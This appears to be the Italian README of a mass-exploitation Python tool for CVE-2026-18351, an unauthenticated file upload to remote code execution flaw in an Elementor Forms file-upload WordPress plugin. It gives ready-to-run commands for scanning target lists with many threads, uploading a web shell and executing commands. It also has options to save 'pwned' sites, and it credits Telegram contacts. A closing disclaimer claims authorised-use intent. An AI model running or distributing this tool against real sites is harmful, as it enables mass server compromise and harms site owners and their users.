Strumento di exploit massivo per CVE-2026-18351, un caricamento arbitrario di file non autenticato con RCE in Elementor Forms <= 1.6.0, con probing passivo, upload della shell ed esecuzione di comandi.
Strumento di exploit massivo per CVE-2026-18351 — Caricamento arbitrario di file non autenticato → RCE in Drag and Drop File Upload for Elementor Forms <= 1.6.0.
crediti johenlastgen | telegram @johenlastgen | canale @jlgnetworkredirect
Nessuna dipendenza esterna — utilizza solo la libreria standard di Python.
python3 --version # 3.6+
# Target singolo — solo controllo passivo (nessun caricamento)
python3 mass.py --url http://target.com --check
# Target singolo — exploit con comando predefinito (id)
python3 mass.py --url http://target.com --cmd id
# Target singolo — exploit con comando personalizzato
python3 mass.py --url http://target.com --cmd whoami
# Target multipli — controllo passivo
python3 mass.py --list targets.txt --threads 50 --check
# Target multipli — exploit
python3 mass.py --list targets.txt --threads 50 --cmd id
# Target multipli — exploit con regolazione del timeout
python3 mass.py --list targets.txt --threads 100 --timeout 8 --cmd whoami
# Salva il log completo
python3 mass.py --list targets.txt --output results.txt
# Salva solo i target vulnerabili
python3 mass.py --list targets.txt --output-vuln vuln.txt
# Salva solo i target con RCE confermata
python3 mass.py --list targets.txt --output-pwned pwned.txt
# Output combinato
python3 mass.py \
--list targets.txt \
--threads 50 \
--cmd id \
--output results.txt \
--output-vuln vuln.txt \
--output-pwned pwned.txt
| Opzione | Descrizione |
|---|---|
--url | URL del target singolo |
--list FILE | File contenente gli URL dei target (uno per riga) |
--check | Solo sonda passiva — nessun caricamento di file |
--cmd CMD | Comando da eseguire sulla shell (predefinito: id) |
--threads N | Numero di thread concorrenti (predefinito: 20) |
--timeout N | Timeout per richiesta in secondi (predefinito: 10) |
--output FILE | Salva il log completo su file |
--output-vuln FILE | Salva solo gli URL dei target vulnerabili su file |
--output-pwned FILE | Salva solo i target con RCE confermata su file |
| Stato | Significato |
|---|---|
PWNED | Shell caricata e RCE confermata |
VULN-NO-EXEC | Caricamento accettato ma esecuzione della shell fallita |
PATCHED | Caricamento rifiutato o nonce non trovato |
ERROR | Errore di rete o di parsing |
Un URL per riga. Le righe che iniziano con # vengono ignorate.
http://target1.com
https://target2.com
# questa riga viene ignorata
http://target3.com
Questo progetto è fornito esclusivamente per valutazioni di sicurezza autorizzate, ricerca sulla sicurezza difensiva e validazione di vulnerabilità.
Utilizzando questo software, confermi di disporre di un'autorizzazione esplicita per valutare i sistemi target. L'accesso non autorizzato a sistemi informatici è proibito e può violare le leggi applicabili.
L'autore e i contributori non incoraggiano né approvano l'uso non autorizzato di questo progetto e non si assumono alcuna responsabilità per qualsiasi uso improprio, danno o conseguenza legale derivante dal suo utilizzo.
JohenLastGen — JLG NETWORK